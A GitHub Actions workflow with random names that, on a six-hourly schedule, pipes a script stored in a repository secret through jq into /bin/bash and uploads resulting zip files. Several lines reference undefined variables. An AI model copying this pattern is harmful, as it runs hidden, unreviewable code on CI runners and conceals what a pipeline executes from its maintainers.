name: zhengsonglianghe
on:
  workflow_dispatch:

  schedule:
    - cron: '52 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhengsonglianghe
        env:
          jnneg1: ${{ secrets.jnneg1 }}
        run: |
          printf '%s' "$jnneg1" | jq -r .rhk256 | /bin/bash
          echo $x490 | jq -r .mj917 | /bin/bash
          printf '%s' "$fncii88370" | jq -r .zq075 | /bin/bash
          printf '%s' "$tc9" | jq -r .mkclb9 | /bin/bash
          echo $hwhb06747 | jq -r .p272 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: nBqTigcQ
          path: "*.zip"
          retention-days: 1
